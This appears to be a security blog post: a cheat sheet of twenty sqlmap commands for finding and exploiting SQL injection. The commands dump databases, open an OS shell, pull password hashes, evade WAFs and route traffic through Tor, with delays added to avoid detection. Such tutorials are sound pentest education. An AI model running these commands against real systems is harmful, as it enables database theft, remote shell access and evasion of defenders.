Home Tech Top 20 SQLmap Commands to Exploit SQL Injection Vulnerabilities

Top 20 SQLmap Commands to Exploit SQL Injection Vulnerabilities

Tech By · March 29, 2025 · 0 Comment
Top 20 SQLMAP Commands

SQLmap is a powerful open-source penetration testing tool used for detecting and exploiting SQL injection vulnerabilities in database-driven applications.

Below are the top 20 sqlmap commands, each serving a unique purpose in database security assessments.

  1. Detect and Exploit SQL Injection
  2. Dump the Database Content
  3. Obtain an OS Shell
  4. Bypass WAF Using Tamper Scripts
  5. Use Hexadecimal Encoding for Payloads
  6. Specify Database Management System (DBMS)
  7. Retrieve DBMS User Privileges
  8. Advanced SQL Injection Testing
  9. Retrieve DBMS Password Hashes
  10. Retrieve DBMS Roles
  11. Retrieve Database Schema
  12. Count Table Entries
  13. Search for Specific Data
  14. Run SQLmap in Non-Interactive Mode
  15. Add Delay Between Requests
  16. Set a Timeout for Each Request
  17. Set the Number of Retries
  18. Use Tor Network for Anonymity
  19. Verify Tor Connectivity
  20. Use a Proxy for Requests

1. Detect and Exploit SQL Injection

sqlmap -u "http://10.228.12.20/page.php?id=1" --dbs

This command scans the target URL for SQL injection vulnerabilities and retrieves the available databases.

2. Dump the Database Content

sqlmap -u "http://10.228.12.20/page.php?id=1" --dump

Once an SQL injection vulnerability is found, this command extracts and dumps the database content.

3. Obtain an OS Shell

sqlmap -u "http://10.228.12.20/page.php?id=1" --os-shell

If the database has sufficient privileges, this command provides access to an OS shell.

4. Bypass WAF Using Tamper Scripts

sqlmap -u "http://10.228.12.20/page.php?id=1" --tamper=space2comment

Bypasses web application firewalls (WAF) using tamper scripts.

5. Use Hexadecimal Encoding for Payloads

sqlmap -u "http://10.228.12.20/page.php?id=1" --hex

Encodes payloads in hexadecimal format to evade filters.

6. Specify Database Management System (DBMS)

sqlmap -u "http://10.228.12.20/page.php?id=1" --dbms=mysql

Defines the target DBMS to tailor SQLmap’s attack strategy.

7. Retrieve DBMS User Privileges

sqlmap -u "http://10.228.12.20/page.php?id=1" --privileges

Lists database user privileges.

8. Advanced SQL Injection Testing

sqlmap -u "http://10.228.12.20/page.php?id=1" --level=5 --risk=3

Increases the depth of SQL injection testing with high risk and level parameters.

9. Retrieve DBMS Password Hashes

sqlmap -u "http://10.228.12.20/page.php?id=1" --passwords

Extracts and displays password hashes stored in the database.

10. Retrieve DBMS Roles

sqlmap -u "http://10.228.12.20/page.php?id=1" --roles

Lists all roles assigned within the DBMS.

11. Retrieve Database Schema

sqlmap -u "http://10.228.12.20/page.php?id=1" --schema

Retrieves the overall database schema.

12. Count Table Entries

sqlmap -u "http://10.228.12.20/page.php?id=1" --count

Counts the number of entries in database tables.

13. Search for Specific Data

sqlmap -u "http://10.228.12.20/page.php?id=1" --search -T users --string="admin"

Searches for specific strings, such as “admin”, within database tables.

14. Run SQLmap in Non-Interactive Mode

sqlmap -u "http://10.228.12.20/page.php?id=1" --batch

Executes SQLmap without user prompts, automating the process.

15. Add Delay Between Requests

sqlmap -u "http://10.228.12.20/page.php?id=1" --delay=5

Adds a delay (in seconds) between HTTP requests to avoid detection.

16. Set a Timeout for Each Request

sqlmap -u "http://10.228.12.20/page.php?id=1" --timeout=10

Sets a timeout limit for each HTTP request.

17. Set the Number of Retries

sqlmap -u "http://10.228.12.20/page.php?id=1" --retries=3

Specifies how many times SQLmap should retry failed requests.

18. Use Tor Network for Anonymity

sqlmap -u "http://10.228.12.20/page.php?id=1" --tor

Routes traffic through the Tor network for anonymous testing.

19. Verify Tor Connectivity

sqlmap -u "http://10.228.12.20/page.php?id=1" --check-tor

Confirms whether SQLmap is correctly using the Tor network.

20. Use a Proxy for Requests

sqlmap -u "http://10.228.12.20/page.php?id=1" --proxy=http://127.0.0.1:8080

Routes SQLmap requests through a specified proxy.

Conclusion

These SQLmap commands help security professionals and penetration testers identify and exploit SQL injection vulnerabilities efficiently. However, they should only be used for ethical testing on authorized systems.

Sarcastic Writer

Related Posts

Top 20 Free Tools Cybersecurity

Top 20 FREE Tools For Cybersecurity Enthusiasts

Top Hacking Tools

Top 66 Hacking Tools You Need To Know

Windows Firewall Management Commands

Top 28 Windows Firewall Management Commands You Need To Know

Cybersecurity Certifications

How to Become a Cybersecurity Consultant with Certifications

Online Science Courses

Top 10 Best Online Science Courses to Take in 2025

Most In Demand Skills

Top 10 Most In-Demand Skills for 2025 and How to Learn Them

SIEM Insider Threats

How SIEM Helps Combat Insider Threats in Real-Time

CISSP Certification

How CISSP Certification Can Boost Your Cybersecurity Career

Leave a Reply